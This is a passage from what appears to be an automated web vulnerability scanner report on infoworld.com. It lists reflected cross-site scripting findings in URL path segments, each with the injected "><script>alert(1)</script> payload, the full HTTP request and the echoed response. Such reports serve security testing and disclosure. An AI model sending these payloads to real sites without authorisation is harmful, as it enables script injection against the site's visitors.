Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.infoworld.com/

Response

HTTP/1.1 404 Not Found
Date: Mon, 19 Sep 2011 19:31:05 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Mon, 19 Sep 2011 19:31:05 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1316460665-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
nnCoection: close
Content-Type: text/html; charset=utf-8
Content-Length: 51170

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<a href="/user?destination=modules/DCP/customf7aa2"><script>alert(1)</script>68e85f8ac10/doubleclick_ads/doubleclick_ads.js&2531">
...[SNIP]...

1.54. http://www.infoworld.com/modules/DCP/custom/doubleclick_ads/doubleclick_ads.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /modules/DCP/custom/doubleclick_ads/doubleclick_ads.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5363"><script>alert(1)</script>78fc02be0dd was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/DCP/custom/doubleclick_adsc5363"><script>alert(1)</script>78fc02be0dd/doubleclick_ads.js?2531 HTTP/1.1
Host: www.infoworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.infoworld.com/

Response

HTTP/1.1 404 Not Found
Date: Mon, 19 Sep 2011 19:31:07 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Mon, 19 Sep 2011 19:31:07 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1316460667-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
nnCoection: close
Content-Type: text/html; charset=utf-8
Content-Length: 51170

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<a href="/user?destination=modules/DCP/custom/doubleclick_adsc5363"><script>alert(1)</script>78fc02be0dd/doubleclick_ads.js&2531">
...[SNIP]...

1.55. http://www.infoworld.com/modules/DCP/custom/doubleclick_ads/doubleclick_ads.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /modules/DCP/custom/doubleclick_ads/doubleclick_ads.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b282"><script>alert(1)</script>495af1f7758 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/DCP/custom/doubleclick_ads/doubleclick_ads.js7b282"><script>alert(1)</script>495af1f7758?2531 HTTP/1.1
Host: www.infoworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.infoworld.com/

Response

HTTP/1.1 404 Not Found
Date: Mon, 19 Sep 2011 19:31:09 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Mon, 19 Sep 2011 19:31:09 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1316460669-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
nnCoection: close
Content-Type: text/html; charset=utf-8
Content-Length: 51170

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<a href="/user?destination=modules/DCP/custom/doubleclick_ads/doubleclick_ads.js7b282"><script>alert(1)</script>495af1f7758&2531">
...[SNIP]...

1.56. http://www.infoworld.com/sites/all/themes/ifw/images/bg_IW_header.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /sites/all/themes/ifw/images/bg_IW_header.jpg

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70789"><script>alert(1)</script>33a9335a895 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites70789"><script>alert(1)</script>33a9335a895/all/themes/ifw/images/bg_IW_header.jpg?123 HTTP/1.1
Host: www.infoworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.infoworld.com/sites/infoworld.com/files/css/css_d1529d6005cb5615e49502036d31b9d1.css
Cookie: mobify=0

Response

HTTP/1.1 404 Not Found
Date: Mon, 19 Sep 2011 19:34:16 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Mon, 19 Sep 2011 19:34:16 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1316460856-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
nnCoection: close
Content-Type: text/html; charset=utf-8
Content-Length: 51160

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<a href="/user?destination=sites70789"><script>alert(1)</script>33a9335a895/all/themes/ifw/images/bg_IW_header.jpg&123">
...[SNIP]...

1.57. http://www.infoworld.com/sites/all/themes/ifw/images/bg_IW_header.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /sites/all/themes/ifw/images/bg_IW_header.jpg

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50ad2"><script>alert(1)</script>ddaaa5a3ff4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all50ad2"><script>alert(1)</script>ddaaa5a3ff4/themes/ifw/images/bg_IW_header.jpg?123 HTTP/1.1
Host: www.infoworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.infoworld.com/sites/infoworld.com/files/css/css_d1529d6005cb5615e49502036d31b9d1.css
Cookie: mobify=0

Response

HTTP/1.1 404 Not Found
Date: Mon, 19 Sep 2011 19:34:17 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Mon, 19 Sep 2011 19:34:17 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1316460857-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
nnCoection: close
Content-Type: text/html; charset=utf-8
Content-Length: 51160

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<a href="/user?destination=sites/all50ad2"><script>alert(1)</script>ddaaa5a3ff4/themes/ifw/images/bg_IW_header.jpg&123">
...[SNIP]...

1.58. http://www.infoworld.com/sites/all/themes/ifw/images/bg_IW_header.jpg [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /sites/all/themes/ifw/images/bg_IW_header.jpg

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3939"><script>alert(1)</script>d7b6b5c04a4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/themesc3939"><script>alert(1)</script>d7b6b5c04a4/ifw/images/bg_IW_header.jpg?123 HTTP/1.1
Host: www.infoworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.infoworld.com/sites/infoworld.com/files/css/css_d1529d6005cb5615e49502036d31b9d1.css
Cookie: mobify=0

Response

HTTP/1.1 404 Not Found
Date: Mon, 19 Sep 2011 19:34:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Mon, 19 Sep 2011 19:34:19 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1316460859-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
nnCoection: close
Content-Type: text/html; charset=utf-8
Content-Length: 51160

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<a href="/user?destination=sites/all/themesc3939"><script>alert(1)</script>d7b6b5c04a4/ifw/images/bg_IW_header.jpg&123">
...[SNIP]...

1.59. http://www.infoworld.com/sites/all/themes/ifw/images/bg_IW_header.jpg [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /sites/all/themes/ifw/images/bg_IW_header.jpg

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4096e"><script>alert(1)</script>92295aff was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/themes/ifw4096e"><script>alert(1)</script>92295aff/images/bg_IW_header.jpg?123 HTTP/1.1
Host: www.infoworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.infoworld.com/sites/infoworld.com/files/css/css_d1529d6005cb5615e49502036d31b9d1.css
Cookie: mobify=0

Response

HTTP/1.1 404 Not Found
Date: Mon, 19 Sep 2011 19:34:21 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Mon, 19 Sep 2011 19:34:21 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1316460861-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
nnCoection: close
Content-Type: text/html; charset=utf-8
Content-Length: 51157

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<a href="/user?destination=sites/all/themes/ifw4096e"><script>alert(1)</script>92295aff/images/bg_IW_header.jpg&123">
...[SNIP]...

1.60. http://www.infoworld.com/sites/all/themes/ifw/images/bg_IW_header.jpg [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /sites/all/themes/ifw/images/bg_IW_header.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfd00"><script>alert(1)</script>683ffd3a4e0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/themes/ifw/imagesdfd00"><script>alert(1)</script>683ffd3a4e0/bg_IW_header.jpg?123 HTTP/1.1
Host: www.infoworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.infoworld.com/sites/infoworld.com/files/css/css_d1529d6005cb5615e49502036d31b9d1.css
Cookie: mobify=0

Response

HTTP/1.1 404 Not Found
Date: Mon, 19 Sep 2011 19:34:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Mon, 19 Sep 2011 19:34:23 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1316460863-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
nnCoection: close
Content-Type: text/html; charset=utf-8
Content-Length: 51160

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<a href="/user?destination=sites/all/themes/ifw/imagesdfd00"><script>alert(1)</script>683ffd3a4e0/bg_IW_header.jpg&123">
...[SNIP]...

1.61. http://www.infoworld.com/sites/all/themes/ifw/images/bg_IW_header.jpg [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /sites/all/themes/ifw/images/bg_IW_header.jpg

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d809"><script>alert(1)</script>61481860264 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/themes/ifw/images/bg_IW_header.jpg7d809"><script>alert(1)</script>61481860264?123 HTTP/1.1
Host: www.infoworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.infoworld.com/sites/infoworld.com/files/css/css_d1529d6005cb5615e49502036d31b9d1.css
Cookie: mobify=0

Response

HTTP/1.1 404 Not Found
Date: Mon, 19 Sep 2011 19:34:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Mon, 19 Sep 2011 19:34:25 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1316460865-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
nnCoection: close
Content-Type: text/html; charset=utf-8
Content-Length: 51160

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<a href="/user?destination=sites/all/themes/ifw/images/bg_IW_header.jpg7d809"><script>alert(1)</script>61481860264&123">
...[SNIP]...

1.62. http://www.infoworld.com/sites/all/themes/ifw/images/bg_IW_logo.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /sites/all/themes/ifw/images/bg_IW_logo.png

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58a05"><script>alert(1)</script>14f73dda556 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites58a05"><script>alert(1)</script>14f73dda556/all/themes/ifw/images/bg_IW_logo.png?123 HTTP/1.1
Host: www.infoworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.infoworld.com/sites/infoworld.com/files/css/css_d1529d6005cb5615e49502036d31b9d1.css
Cookie: mobify=0

Response

HTTP/1.1 404 Not Found
Date: Mon, 19 Sep 2011 19:33:34 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Mon, 19 Sep 2011 19:33:34 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1316460814-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
nnCoection: close
Content-Type: text/html; charset=utf-8
Content-Length: 51158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<a href="/user?destination=sites58a05"><script>alert(1)</script>14f73dda556/all/themes/ifw/images/bg_IW_logo.png&123">
...[SNIP]...

1.63. http://www.infoworld.com/sites/all/themes/ifw/images/bg_IW_logo.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /sites/all/themes/ifw/images/bg_IW_logo.png

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1319"><script>alert(1)</script>8e955d7e8ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/allc1319"><script>alert(1)</script>8e955d7e8ca/themes/ifw/images/bg_IW_logo.png?123 HTTP/1.1
Host: www.infoworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.infoworld.com/sites/infoworld.com/files/css/css_d1529d6005cb5615e49502036d31b9d1.css
Cookie: mobify=0

Response

HTTP/1.1 404 Not Found
Date: Mon, 19 Sep 2011 19:33:36 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Mon, 19 Sep 2011 19:33:36 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1316460816-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
nnCoection: close
Content-Type: text/html; charset=utf-8
Content-Length: 51158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<a href="/user?destination=sites/allc1319"><script>alert(1)</script>8e955d7e8ca/themes/ifw/images/bg_IW_logo.png&123">
...[SNIP]...

1.64. http://www.infoworld.com/sites/all/themes/ifw/images/bg_IW_logo.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /sites/all/themes/ifw/images/bg_IW_logo.png

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e998"><script>alert(1)</script>14859ccfad0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/themes4e998"><script>alert(1)</script>14859ccfad0/ifw/images/bg_IW_logo.png?123 HTTP/1.1
Host: www.infoworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.infoworld.com/sites/infoworld.com/files/css/css_d1529d6005cb5615e49502036d31b9d1.css
Cookie: mobify=0

Response

HTTP/1.1 404 Not Found
Date: Mon, 19 Sep 2011 19:33:38 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Mon, 19 Sep 2011 19:33:38 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1316460818-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
nnCoection: close
Content-Type: text/html; charset=utf-8
Content-Length: 51158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<a href="/user?destination=sites/all/themes4e998"><script>alert(1)</script>14859ccfad0/ifw/images/bg_IW_logo.png&123">
...[SNIP]...

1.65. http://www.infoworld.com/sites/all/themes/ifw/images/bg_IW_logo.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /sites/all/themes/ifw/images/bg_IW_logo.png

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5a71"><script>alert(1)</script>2543958b4bc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/themes/ifwc5a71"><script>alert(1)</script>2543958b4bc/images/bg_IW_logo.png?123 HTTP/1.1
Host: www.infoworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.infoworld.com/sites/infoworld.com/files/css/css_d1529d6005cb5615e49502036d31b9d1.css
Cookie: mobify=0

Response

HTTP/1.1 404 Not Found
Date: Mon, 19 Sep 2011 19:33:41 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Mon, 19 Sep 2011 19:33:41 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1316460821-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
nnCoection: close
Content-Type: text/html; charset=utf-8
Content-Length: 51158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<a href="/user?destination=sites/all/themes/ifwc5a71"><script>alert(1)</script>2543958b4bc/images/bg_IW_logo.png&123">
...[SNIP]...

1.66. http://www.infoworld.com/sites/all/themes/ifw/images/bg_IW_logo.png [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /sites/all/themes/ifw/images/bg_IW_logo.png

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eae20"><script>alert(1)</script>8627bbb48ee was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/themes/ifw/imageseae20"><script>alert(1)</script>8627bbb48ee/bg_IW_logo.png?123 HTTP/1.1
Host: www.infoworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.infoworld.com/sites/infoworld.com/files/css/css_d1529d6005cb5615e49502036d31b9d1.css
Cookie: mobify=0

Response

HTTP/1.1 404 Not Found
Date: Mon, 19 Sep 2011 19:33:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Mon, 19 Sep 2011 19:33:43 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1316460823-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
nnCoection: close
Content-Type: text/html; charset=utf-8
Content-Length: 51158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<a href="/user?destination=sites/all/themes/ifw/imageseae20"><script>alert(1)</script>8627bbb48ee/bg_IW_logo.png&123">
...[SNIP]...

1.67. http://www.infoworld.com/sites/all/themes/ifw/images/bg_IW_logo.png [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /sites/all/themes/ifw/images/bg_IW_logo.png

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41385"><script>alert(1)</script>6200c116d34 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/themes/ifw/images/bg_IW_logo.png41385"><script>alert(1)</script>6200c116d34?123 HTTP/1.1
Host: www.infoworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.infoworld.com/sites/infoworld.com/files/css/css_d1529d6005cb5615e49502036d31b9d1.css
Cookie: mobify=0

Response

HTTP/1.1 404 Not Found
